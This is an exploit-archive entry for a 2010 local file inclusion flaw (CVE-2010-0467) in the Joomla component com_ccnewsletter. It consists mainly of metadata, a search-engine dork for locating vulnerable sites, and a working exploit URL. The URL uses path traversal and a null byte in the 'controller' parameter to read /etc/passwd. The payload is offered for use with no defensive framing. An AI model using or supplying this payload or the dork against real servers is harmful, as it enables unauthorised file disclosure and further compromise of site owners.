Joomla! Component CCNewsLetter - Local File Inclusion

Author: AtT4CKxT3rR0r1ST
type: webapps
platform: php
port: 
date_added: 2010-01-27 
date_updated: 2017-07-28 
verified: 1 
codes: OSVDB-62000;CVE-2010-0467 
tags: 
aliases:  
screenshot_url:  
application_url: 

Joomla Component com_ccnewsletter Local File Inclusion
==========================================================

###########################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Home           : www.sec-attack.com/vb

.:. Script         : Joomla Component com_ccnewsletter

.:. Bug Type       : Local File Inclusion [LFI]

.:. Dork           : inurl:"com_ccnewsletter"

.:. Date           : 28/1/2010

#############################################

===[ Exploit ]===

http://server/index.php?option=com_ccnewsletter&controller=[LFI]

http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00


#############################################

Greats T0: My Mind & All member Sec Attack